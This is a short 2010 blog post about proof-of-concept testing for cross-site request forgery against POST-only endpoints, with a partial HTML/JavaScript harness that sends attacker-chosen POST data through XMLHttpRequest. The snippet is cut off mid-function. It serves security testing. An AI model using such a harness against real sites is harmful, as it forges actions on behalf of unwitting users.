XSRF POST Testing
Wednesday, February 3rd, 2010 by webstersprodigyPOC XSRFs that only allow POST is not as straightforward as the GET. I use something like the following for situations like that. <html> <head></head> <body> <script> function poststuff() { var site = document.getElementById("posturl").value; var post_data = document.getElementById("postparam").value; alert("site: " + site); alert("pdata: " + post_data); var xmlhttp=new XMLHttpRequest(); xmlhttp.open("POST", site, true); xmlhttp.onreadystatechange = function [...]